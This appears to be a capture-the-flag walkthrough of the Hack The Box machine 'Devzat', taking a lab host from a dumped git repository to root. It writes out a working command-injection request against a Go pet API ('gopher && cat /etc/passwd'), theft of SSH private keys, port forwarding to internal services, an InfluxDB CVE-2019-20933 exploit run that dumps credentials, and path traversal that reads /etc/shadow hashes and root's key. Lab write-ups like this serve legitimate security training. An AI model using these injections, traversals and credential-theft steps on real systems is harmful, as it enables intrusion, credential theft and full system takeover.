[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/.gitignore
[+] Found folder: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/bluewhale
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/cat
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/dog
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/giraffe
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/gopher
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/petshop
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/redkite
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/go.mod
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/go.sum
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/main.go
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/petshop
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/
[+] Found folder: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/static
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/static/.gitignore
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/static/
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/static/package.json
[+] Found folder: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/static/public
[+] Found folder: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/static/public/css
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/static/public/css/all.min.css
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/static/public/css/bootstrap.min.css
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/static/public/css/global.css
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/static/public/favicon.ico
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/static/public/index.html
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/static/rollup.config.js
[+] Found folder: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/static/src
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/static/src/App.svelte
[+] Found file: /home/kali/Hackthebox/Devzat/gitdump/2-8274d7a547c0c3854c074579dfc359664082a8f6/static/src/main.js

This leaves us with three directories. I will open this directory in Visual Code as get a bit code based here.

   ~/Hackthebox/Devzat/gitdump  on   master ?11 ···························································································· ✔  at 18:21:47  ─╮
╰─ ls -l                                                                                                                                                                  ─╯
total 12
drwxr-xr-x 4 kali kali 4096 Mar  9 18:20 0-ef07a04ebb2fc92cf74a39e0e4b843630666a705
drwxr-xr-x 4 kali kali 4096 Mar  9 18:20 1-464614f32483e1fde60ee53f5d3b4d468d80ff62
drwxr-xr-x 4 kali kali 4096 Mar  9 18:20 2-8274d7a547c0c3854c074579dfc359664082a8f6

After a few hours or cups of coffee, I located a potential code mistake. To fully understand what this page is doing, let’s open burpsuite and see what the GET/POST Requests look like.

Example GET Request to the page:

GET / HTTP/1.1
Host: pets.devzat.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Example GET Request for the API:

GET /api/pet HTTP/1.1
Host: pets.devzat.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://pets.devzat.htb/
Connection: close
Cache-Control: max-age=0

Example POST Request for the API:

POST /api/pet HTTP/1.1
Host: pets.devzat.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://pets.devzat.htb/
Content-Type: text/plain;charset=UTF-8
Origin: http://pets.devzat.htb
Content-Length: 38
Connection: close

{"name":"New Pet","species":"redkite"}

After more enumeration throwing XXS, SSRF, SSTI, brute forcing, etc into the api. I located the source code we could manipulate.

Main.go file contents (that matter):

type Pet struct {
	Name            string `json:"name"`
	Species         string `json:"species"`
	Characteristics string `json:"characteristics"`

var (
	Pets []Pet = []Pet{
		{Name: "Cookie", Species: "cat", Characteristics: loadCharacter("cat")},
		{Name: "Mia", Species: "cat", Characteristics: loadCharacter("cat")},
		{Name: "Chuck", Species: "dog", Characteristics: loadCharacter("dog")},
		{Name: "Balu", Species: "dog", Characteristics: loadCharacter("dog")},
		{Name: "Georg", Species: "gopher", Characteristics: loadCharacter("gopher")},
		{Name: "Gustav", Species: "giraffe", Characteristics: loadCharacter("giraffe")},
		{Name: "Rudi", Species: "redkite", Characteristics: loadCharacter("redkite")},
		{Name: "Bruno", Species: "bluewhale", Characteristics: loadCharacter("bluewhale")},

func loadCharacter(species string) string {
	cmd := exec.Command("sh", "-c", "cat characteristics/"+species)
	stdoutStderr, err := cmd.CombinedOutput()
	if err != nil {
		return err.Error()
	return string(stdoutStderr)

func getPets(w http.ResponseWriter, r *http.Request) {

func addPet(w http.ResponseWriter, r *http.Request) {
	reqBody, _ := ioutil.ReadAll(r.Body)
	var addPet Pet
	err := json.Unmarshal(reqBody, &addPet)
	if err != nil {
		e := fmt.Sprintf("There has been an error: %+v", err)
		http.Error(w, e, http.StatusBadRequest)

	addPet.Characteristics = loadCharacter(addPet.Species)
	Pets = append(Pets, addPet)

	fmt.Fprint(w, "Pet was added successfully")

func handleRequest() {
	build, err := fs.Sub(web, "static/public/build")
	if err != nil {

	css, err := fs.Sub(web, "static/public/css")
	if err != nil {

	webfonts, err := fs.Sub(web, "static/public/webfonts")
	if err != nil {

	spaHandler := http.HandlerFunc(spaHandlerFunc)
	// Single page application handler
	http.Handle("/", headerMiddleware(spaHandler))

	// All static folder handler
	http.Handle("/build/", headerMiddleware(http.StripPrefix("/build", http.FileServer(http.FS(build)))))
	http.Handle("/css/", headerMiddleware(http.StripPrefix("/css", http.FileServer(http.FS(css)))))
	http.Handle("/webfonts/", headerMiddleware(http.StripPrefix("/webfonts", http.FileServer(http.FS(webfonts)))))
	http.Handle("/.git/", headerMiddleware(http.StripPrefix("/.git", http.FileServer(http.Dir(".git")))))

	// API routes
	apiHandler := http.HandlerFunc(petHandler)
	http.Handle("/api/pet", headerMiddleware(apiHandler))
	log.Fatal(http.ListenAndServe("", nil))

func spaHandlerFunc(w http.ResponseWriter, r *http.Request) {

func petHandler(w http.ResponseWriter, r *http.Request) {
	// Dispatch by method
	if r.Method == http.MethodPost {
		addPet(w, r)
	} else if r.Method == http.MethodGet {
		getPets(w, r)

	} else {
		http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
	// TODO: Add Update and Delete

func headerMiddleware(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.Header().Add("Server", "My genious go pet server")
		next.ServeHTTP(w, r)

In the function, loadCharacter, we see it is calling a sh command to cat a file in a characteristics directory. We can do some simple input injection into the API Species filed and get code execution! I tried to make it easier to understand below: Original

func loadCharacter(species string) string {
	cmd := exec.Command("sh", "-c", "cat characteristics/"+species)
	stdoutStderr, err := cmd.CombinedOutput()
	if err != nil {
		return err.Error()
	return string(stdoutStderr)

Pseudo code of what we want to happen

func loadCharacter(species string) string {
	// Our species string will look like gopher && cat /etc/passwd
	cmd := exec.Command("sh", "-c", "cat characteristics/"+species)
	stdoutStderr, err := cmd.CombinedOutput()
	if err != nil {
		return err.Error()
	return string(stdoutStderr)

Trying out our theory

Post Request sent:

POST /api/pet HTTP/1.1
Host: pets.devzat.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://pets.devzat.htb/
Content-Type: text/plain;charset=UTF-8
Origin: http://pets.devzat.htb
Content-Length: 37
Connection: close

{"name":"evilpet","species":"gopher && cat /etc/passwd"}

It worked! ![[Pasted image 20220309183203.png]]

Now we can see if we can grab the current users SSH private key (Run ‘id’ as command to find current user)

![[Pasted image 20220309183334.png]]

Let’s throw that into our kali and attempt to ssh as patrick to the host.

    ~/Hackthebox/Devzat  on   master ?11 ························································································ ✔  took 3s   at 18:34:02  ─╮
╰─ ssh -i id_rsa patrick@devzat.htb                                                                                                                                       ─╯
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Wed 09 Mar 2022 11:34:14 PM UTC

  System load:  0.0               Processes:                238
  Usage of /:   56.0% of 7.81GB   Users logged in:          0
  Memory usage: 22%               IPv4 address for docker0:
  Swap usage:   0%                IPv4 address for eth0:

107 updates can be applied immediately.
33 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

patrick@devzat:~$ whoami

It worked!

Privilege Escalation

Enumerating the system, we run into some of the devzat source code being hosted in patrick’s home directory.

The vulnerability is located on line 272-283 in devchat.go.

if != "12ca17b49af2289436f303e0166030a21e525d266e209267433801a8fd4071a0" {
                for possibleName == "patrick" || possibleName == "admin" || possibleName == "catherine" {
                        u.writeln("", "Nickname reserved for local use, please choose a different one.")
                        u.term.SetPrompt("> ")
                        possibleName, err = u.term.ReadLine()
                        if err != nil {
                        possibleName = cleanName(possibleName)

Placing that hash into crackstation (not good OPSEC but it’s a CTF :P)

![[Pasted image 20220309184226.png]]

So we can interpret the code is saying.. If we are localhost -> we can use admin, catherine, and patrick user.

We also know that from earlier the chat is running on port 8000 (also confirmed below)

patrick@devzat:~$ lsof -i:8000
devchat 888 patrick    7u  IPv6  35037      0t0  TCP *:8000 (LISTEN)

We can port forward the port 8000 to our local machine

    ~/Hackthebox/Devzat  on   master ?12 ········································································································································································· ✔  took 12m 12s   at 18:46:23  ─╮
╰─ ssh -i id_rsa -L 8000:localhost:8000 patrick@devzat.htb                                                                                                                                                                                                      ─╯
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Wed 09 Mar 2022 11:46:41 PM UTC

  System load:  0.01              Processes:                234
  Usage of /:   56.0% of 7.81GB   Users logged in:          0
  Memory usage: 22%               IPv4 address for docker0:
  Swap usage:   0%                IPv4 address for eth0:

107 updates can be applied immediately.
33 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to Check your Internet connection or proxy settings

Last login: Wed Mar  9 23:34:15 2022 from

Now we can ssh to our localhost and it will represent localhost on the devzat machine. (in a new shell, leave the ssh connection alive)

╭─    ~/Hackthebox/Devzat  on   master ?12 ······················································· ✔  at 18:47:24  ─╮
╰─ ssh -l patrick localhost -p 8000                                                                                          ─╯
The authenticity of host '[localhost]:8000 ([::1]:8000)' can't be established.
RSA key fingerprint is SHA256:f8dMo2xczXRRA43d9weJ7ReJdZqiCxw5vP7XqBaZutI.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:17: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[localhost]:8000' (RSA) to the list of known hosts.
admin: Hey patrick, you there?
patrick: Sure, shoot boss!
admin: So I setup the influxdb for you as we discussed earlier in business meeting.
patrick: Cool 👍
admin: Be sure to check it out and see if it works for you, will ya?
patrick: Yes, sure. Am on it!
devbot: admin has left the chat
Welcome to the chat. There are no more users
devbot: patrick has joined the chat

Taking the hint that the machine is running influxdb. We portforwared this alternative port 8443 and it seems to me a new version of the chat running with an explicit version of the influx DB

╰─ ssh -i id_rsa -L 8443:localhost:8443 patrick@devzat.htb                                                                   ─╯
   ~/H/Devzat  on   master ?12 · INT ✘  took 7m 27s   at 18:54:05  ─╮
╰─ ssh -l admin localhost -p 8443                                                 ─╯
admin: Hey patrick, you there?
patrick: Sure, shoot boss!
admin: So I setup the influxdb 1.7.5 for you as we discussed earlier in business
patrick: Cool 👍
admin: Be sure to check it out and see if it works for you, will ya?
patrick: Yes, sure. Am on it!
Welcome to the chat. There are no more users
devbot: admin has joined the chat

Using this github, we are able to exploit the running DB with no changes to the script (other than port forwarding the 8086 port to locahost)

    ~/Hackthebox/Devzat  on   master ?12 ···································· INT ✘  took 3m 3s   at 18:57:05  ─╮
╰─ ssh -i id_rsa -L 8086:localhost:8086 patrick@devzat.htb       
╭─    ~/Hackthebox/Devzat  on   master ?11 ··········································································· ✔  at 18:58:33  ─╮
╰─ git clone                                                               ─╯
Cloning into 'InfluxDB-Exploit-CVE-2019-20933'...
remote: Enumerating objects: 37, done.
remote: Counting objects: 100% (37/37), done.
remote: Compressing objects: 100% (31/31), done.
remote: Total 37 (delta 12), reused 14 (delta 4), pack-reused 0
Receiving objects: 100% (37/37), 10.58 KiB | 10.58 MiB/s, done.
Resolving deltas: 100% (12/12), done.

╭─    ~/Hackthebox/Devzat  on   master ?12 ··········································································· ✔  at 18:58:35  ─╮
╰─ cd InfluxDB-Exploit-CVE-2019-20933                                                                                                            ─╯

╭─    ~/Hackthebox/Devzat/InfluxDB-Exploit-CVE-2019-20933  on   master ··············································· ✔  at 18:58:39  ─╮
╰─ python                                                                                                                            ─╯

  _____        __ _            _____  ____    ______            _       _ _   
 |_   _|      / _| |          |  __ \|  _ \  |  ____|          | |     (_) |  
   | |  _ __ | |_| |_   ___  __ |  | | |_) | | |__  __  ___ __ | | ___  _| |_ 
   | | | '_ \|  _| | | | \ \/ / |  | |  _ <  |  __| \ \/ / '_ \| |/ _ \| | __|
  _| |_| | | | | | | |_| |>  <| |__| | |_) | | |____ >  <| |_) | | (_) | | |_ 
 |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/  |______/_/\_\ .__/|_|\___/|_|\__|
                                                         | |                  
 - using CVE-2019-20933

Host (default: localhost): 
Port (default: 8086): 
Username <OR> path to username file (default: users.txt): 

Bruteforcing usernames ...
[v] admin

Host vulnerable !!!


1) devzat
2) _internal

.quit to exit
[admin@] Database: 

Starting InfluxDB shell - .back to go back
[admin@] $ show field keys
    "results": [
            "series": [
                    "columns": [
                    "name": "user",
                    "values": [
            "statement_id": 0
[admin@] $ select * from "user"
    "results": [
            "series": [
                    "columns": [
                    "name": "user",
                    "values": [
            "statement_id": 0
[admin@] $ 

Great we got some creds for Catherine (we can’t ssh due to being key only SSH). We can su on our already existing shell of patricks to su

patrick@devzat:~$ su catherine
catherine@devzat:/home/patrick$ whoami

We can port forward back the port 8443 to see the new chat notes for catherine.

ssh -i id_rsa -L 8443:localhost:8443 patrick@devzat.htb                        ─╯
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

There are notes from patrick about a new feature implemented and to see the difference we would need to run diff on the two backups to see the code changes. Let’s grab those backups from /var/backups directory on the host and pull them to catherine’s home directory.

 ssh -l catherine localhost -p 8443                                                                                        ─╯
patrick: Hey Catherine, glad you came.
catherine: Hey bud, what are you up to?
patrick: Remember the cool new feature we talked about the other day?
catherine: Sure
patrick: I implemented it. If you want to check it out you could connect to the local dev instance on port 8443.
catherine: Kinda busy right now 👔
patrick: That's perfectly fine 👍  You'll need a password which you can gather from the source. I left it in our default backups
catherine: k
patrick: I also put the main so you could diff main dev if you want.
catherine: Fine. As soon as the boss let me off the leash I will check it out.
patrick: Cool. I am very curious what you think of it. Consider it alpha state, though. Might not be secure yet. See ya!
devbot: patrick has left the chat
Welcome to the chat. There are no more users
devbot: catherine has joined the chat
catherine@devzat:~$ cp /var/backups/devzat-* .
catherine@devzat:~$ ll
total 88
drwxr-xr-x 4 catherine catherine  4096 Mar 10 00:03 ./
drwxr-xr-x 4 root      root       4096 Jun 22  2021 ../
lrwxrwxrwx 1 root      root          9 Jun 22  2021 .bash_history -> /dev/null
-rw-r--r-- 1 catherine catherine   220 Jun 22  2021 .bash_logout
-rw-r--r-- 1 catherine catherine  3808 Jun 22  2021 .bashrc
drwx------ 2 catherine catherine  4096 Sep 21 19:35 .cache/
-rw------- 1 catherine catherine 28297 Mar 10 00:03
-rw------- 1 catherine catherine 27567 Mar 10 00:03
-rw-r--r-- 1 catherine catherine   807 Jun 22  2021 .profile
drwx------ 2 catherine catherine  4096 Sep 29 16:31 .ssh/
-r-------- 1 catherine catherine    33 Mar  9 22:36 user.txt

unzipping both files to run diff on:

catherine@devzat:~$ unzip 
   creating: main/
  inflating: main/go.mod             
 extracting: main/.gitignore         
  inflating: main/util.go            
  inflating: main/eastereggs.go      
  inflating: main/          
  inflating: main/games.go           
  inflating: main/colors.go          
 extracting: main/log.txt            
  inflating: main/commands.go        
  inflating: main/           
  inflating: main/devchat.go         
  inflating: main/LICENSE            
  inflating: main/commandhandler.go  
  inflating: main/art.txt            
  inflating: main/go.sum             
  inflating: main/allusers.json      
catherine@devzat:~$ unzip 
   creating: dev/
  inflating: dev/go.mod              
 extracting: dev/.gitignore          
  inflating: dev/util.go             
  inflating: dev/testfile.txt        
  inflating: dev/eastereggs.go       
  inflating: dev/           
  inflating: dev/games.go            
  inflating: dev/colors.go           
 extracting: dev/log.txt             
  inflating: dev/commands.go         
  inflating: dev/            
  inflating: dev/devchat.go          
  inflating: dev/LICENSE             
  inflating: dev/commandhandler.go   
  inflating: dev/art.txt             
  inflating: dev/go.sum              
 extracting: dev/allusers.json       

catherine@devzat:~$ diff main dev
diff main/allusers.json dev/allusers.json
< {
<    "eff8e7ca506627fe15dda5e0e512fcaad70b6d520f37cc76597fdb4f2d83a1a3": "\u001b[38;5;214mtest\u001b[39m"
< }
> {}
diff main/commands.go dev/commands.go
> 	"bufio"
> 	"os"
> 	"path/filepath"
> 		file        = commandInfo{"file", "Paste a files content directly to chat [alpha]", fileCommand, 1, false, nil}
< 	commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode}
> 	commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode, file}
> }
> func fileCommand(u *user, args []string) {
> 	if len(args) < 1 {
> 		u.system("Please provide file to print and the password")
> 		return
> 	}
> 	if len(args) < 2 {
> 		u.system("You need to provide the correct password to use this function")
> 		return
> 	}
> 	path := args[0]
> 	pass := args[1]
> 	// Check my secure password
> 	if pass != "CeilingCatStillAThingIn2021?" {
> 		u.system("You did provide the wrong password")
> 		return
> 	}
> 	// Get CWD
> 	cwd, err := os.Getwd()
> 	if err != nil {
> 		u.system(err.Error())
> 	}
> 	// Construct path to print
> 	printPath := filepath.Join(cwd, path)
> 	// Check if file exists
> 	if _, err := os.Stat(printPath); err == nil {
> 		// exists, print
> 		file, err := os.Open(printPath)
> 		if err != nil {
> 			u.system(fmt.Sprintf("Something went wrong opening the file: %+v", err.Error()))
> 			return
> 		}
> 		defer file.Close()
> 		scanner := bufio.NewScanner(file)
> 		for scanner.Scan() {
> 			u.system(scanner.Text())
> 		}
> 		if err := scanner.Err(); err != nil {
> 			u.system(fmt.Sprintf("Something went wrong printing the file: %+v", err.Error()))
> 		}
> 		return
> 	} else if os.IsNotExist(err) {
> 		// does not exist, print error
> 		u.system(fmt.Sprintf("The requested file @ %+v does not exist!", printPath))
> 		return
> 	}
> 	// bokred?
> 	u.system("Something went badly wrong.")
diff main/devchat.go dev/devchat.go
< 	port = 8000
> 	port = 8443
< 		fmt.Sprintf(":%d", port),
> 		fmt.Sprintf("", port),
Only in dev: testfile.txt

We get another credential for perhaps root! We also see there is a new command called file that takes two arguments

  • File to be pasted into chat
  • Password

We can assume we have the pasword so now let’s see if we can dump some files.

Dumping Shadow file for password hashes:

ssh -l catherine localhost -p 8443                                                                                        ─╯
patrick: Hey Catherine, glad you came.
catherine: Hey bud, what are you up to?
patrick: Remember the cool new feature we talked about the other day?
catherine: Sure
patrick: I implemented it. If you want to check it out you could connect to the local dev instance on port 8443.
catherine: Kinda busy right now 👔
patrick: That's perfectly fine 👍  You'll need a password which you can gather from the source. I left it in our default backups
catherine: k
patrick: I also put the main so you could diff main dev if you want.
catherine: Fine. As soon as the boss let me off the leash I will check it out.
patrick: Cool. I am very curious what you think of it. Consider it alpha state, though. Might not be secure yet. See ya!
devbot: patrick has left the chat
Welcome to the chat. There are no more users
devbot: catherine has joined the chat
catherine: /file
[SYSTEM] Please provide file to print and the password
catherine: /file /etc/shadow CeilingCatStillAThingIn2021?
[SYSTEM] The requested file @ /root/devzat/etc/shadow does not exist!
catherine: /file ../../../../../../etc/shadow CeilingCatStillAThingIn2021?
[SYSTEM] root:$6$DKdyL4hqyhhxcRyc$8N.1K/dHPqLb7VSB0IvfB.uhIKsH7IeGP/iyTRSYImFiAawsaUOKs/TWe0DCp5wSscYvi.XjX8JPe6lZNnEmH/:18891:0
[SYSTEM] daemon:*:18659:0:99999:7:::
[SYSTEM] bin:*:18659:0:99999:7:::
[SYSTEM] sys:*:18659:0:99999:7:::
[SYSTEM] sync:*:18659:0:99999:7:::
[SYSTEM] games:*:18659:0:99999:7:::
[SYSTEM] man:*:18659:0:99999:7:::
[SYSTEM] lp:*:18659:0:99999:7:::
[SYSTEM] mail:*:18659:0:99999:7:::
[SYSTEM] news:*:18659:0:99999:7:::
[SYSTEM] uucp:*:18659:0:99999:7:::
[SYSTEM] proxy:*:18659:0:99999:7:::
[SYSTEM] www-data:*:18659:0:99999:7:::
[SYSTEM] backup:*:18659:0:99999:7:::
[SYSTEM] list:*:18659:0:99999:7:::
[SYSTEM] irc:*:18659:0:99999:7:::
[SYSTEM] gnats:*:18659:0:99999:7:::
[SYSTEM] nobody:*:18659:0:99999:7:::
[SYSTEM] systemd-network:*:18659:0:99999:7:::
[SYSTEM] systemd-resolve:*:18659:0:99999:7:::
[SYSTEM] systemd-timesync:*:18659:0:99999:7:::
[SYSTEM] messagebus:*:18659:0:99999:7:::
[SYSTEM] syslog:*:18659:0:99999:7:::
[SYSTEM] _apt:*:18659:0:99999:7:::
[SYSTEM] tss:*:18659:0:99999:7:::
[SYSTEM] uuidd:*:18659:0:99999:7:::
[SYSTEM] tcpdump:*:18659:0:99999:7:::
[SYSTEM] landscape:*:18659:0:99999:7:::
[SYSTEM] pollinate:*:18659:0:99999:7:::
[SYSTEM] sshd:*:18800:0:99999:7:::
[SYSTEM] systemd-coredump:!!:18800::::::
[SYSTEM] patrick:$6$7ni9PM4l99B7EKPi$/uLBm1IhrKmkS9xPaIgRRZj8aVfASc4eIZt.FvNDEz2r06MIsQMEf3bNegOIxGI./UsabjqsRSV6hWxrJrqbj0:1880
[SYSTEM] catherine:$6$.T9ZmexDFzOpXCH/$u9TICZ3NN5HOC1lWNHGuXP0Hyn/R8HMPS12kUgFdPAwUNl8F3qd5yuL6ptmW40IrBLxBMOTjskHfu1CwK72bw0:18
[SYSTEM] usbmux:*:18800:0:99999:7:::

Boom! We have root RCE! Now let’s grab root’s private key and ssh (similar how patrick’s RCE)

catherine: /file ../.ssh/id_rsa CeilingCatStillAThingIn2021?
[SYSTEM] AAAECtFKzlEg5E6446RxdDKxslb4Cmd2fsqfPPOffYNOP20d+v8nnFgciadUghCpQomz7s

Place that into id_root_rsa and ssh!

╭─    ~/Hackthebox/Devzat  on   master ?12 ·························································································································································································· ✔  at 19:09:12  ─╮
╰─ ssh -i id_root_rsa root@devzat.htb                                                                                                                                                                                                                           ─╯
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  System information as of Thu 10 Mar 2022 12:09:25 AM UTC

  System load:  0.01              Processes:                242
  Usage of /:   56.0% of 7.81GB   Users logged in:          1
  Memory usage: 24%               IPv4 address for docker0:
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root@devzat:~# uname -a
Linux devzat 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
root@devzat:~# whoami
root@devzat:~# wc -l root.txt 
1 root.txt